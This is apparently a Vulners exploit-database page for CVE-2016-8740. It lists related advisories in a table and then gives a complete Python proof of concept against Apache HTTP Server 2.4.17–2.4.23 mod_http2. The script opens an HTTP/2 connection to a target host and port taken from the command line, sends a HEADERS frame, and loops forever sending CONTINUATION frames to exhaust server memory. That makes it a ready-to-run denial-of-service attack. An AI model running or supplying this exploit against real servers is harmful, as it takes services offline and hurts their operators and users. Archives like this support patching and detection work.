| Reporter | Title | Published | Views | Family All 83 |
|---|---|---|---|---|
| Apache HTTPD Web Server 2.4.23 Memory Exhaustion Vulnerability | 8 Dec 201600:00 | – | zdt | |
| Security fix for the ALT Linux 8 package apache2 version 1:2.4.25-alt1 | 18 May 201700:00 | – | altlinux | |
| Security fix for the ALT Linux 10 package apache2 version 1:2.4.25-alt1 | 18 May 201700:00 | – | altlinux | |
| Security fix for the ALT Linux 9 package apache2 version 1:2.4.25-alt1 | 18 May 201700:00 | – | altlinux | |
| macOS < 10.13 Multiple Vulnerabilities | 10 Apr 201900:00 | – | nessus | |
| Apache HTTP Server 2.4.x < 2.4.25 Multiple Vulnerabilities | 25 Jan 201700:00 | – | nessus | |
| Apache 2.4.x < 2.4.25 Multiple Vulnerabilities (httpoxy) | 12 Jan 201700:00 | – | nessus | |
| Fedora 25 : httpd (2016-260d22944d) | 9 Dec 201600:00 | – | nessus | |
| Fedora 24 : httpd (2016-b39fedec11) | 12 Dec 201600:00 | – | nessus | |
| FreeBSD : Apache httpd -- several vulnerabilities (862d6ab3-c75e-11e6-9f98-20cf30e32f6d) (httpoxy) | 21 Dec 201600:00 | – | nessus |
#!/usr/bin/python
""" source : http://seclists.org/bugtraq/2016/Dec/3
The mod_http2 module in the Apache HTTP Server 2.4.17 through 2.4.23, when the Protocols configuration includes h2 or h2c, does not restrict request-header length, which allows remote attackers to cause a denial of service (memory consumption) via crafted CONTINUATION frames in an HTTP/2 request.(https://access.redhat.com/security/cve/cve-2016-8740)
Usage : cve-2016-8740.py [HOST] [PORT]
"""
import sys
import struct
import socket
HOST = sys.argv[1]
PORT = int(sys.argv[2])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
# https://http2.github.io/http2-spec/#ConnectionHeader
s.sendall('PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n')
# https://http2.github.io/http2-spec/#SETTINGS
SETTINGS = struct.pack('3B', 0x00, 0x00, 0x00) # Length
SETTINGS += struct.pack('B', 0x04) # Type
SETTINGS += struct.pack('B', 0x00)
SETTINGS += struct.pack('>I', 0x00000000)
s.sendall(SETTINGS)
# https://http2.github.io/http2-spec/#HEADERS
HEADER_BLOCK_FRAME = '\x82\x84\x86\x41\x86\xa0\xe4\x1d\x13\x9d\x09\x7a\x88\x25\xb6\x50\xc3\xab\xb6\x15\xc1\x53\x03\x2a\x2f\x2a\x40\x83\x18\xc6\x3f\x04\x76\x76\x76\x76'
HEADERS = struct.pack('>I', len(HEADER_BLOCK_FRAME))[1:] # Length
HEADERS += struct.pack('B', 0x01) # Type
HEADERS += struct.pack('B', 0x00) # Flags
HEADERS += struct.pack('>I', 0x00000001) # Stream ID
s.sendall(HEADERS + HEADER_BLOCK_FRAME)
# Sending CONTINUATION frames for leaking memory
# https://http2.github.io/http2-spec/#CONTINUATION
while True:
HEADER_BLOCK_FRAME = '\x40\x83\x18\xc6\x3f\x04\x76\x76\x76\x76'
HEADERS = struct.pack('>I', len(HEADER_BLOCK_FRAME))[1:] # Length
HEADERS += struct.pack('B', 0x09) # Type
HEADERS += struct.pack('B', 0x01) # Flags
HEADERS += struct.pack('>I', 0x00000001) # Stream ID
s.sendall(HEADERS + HEADER_BLOCK_FRAME)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation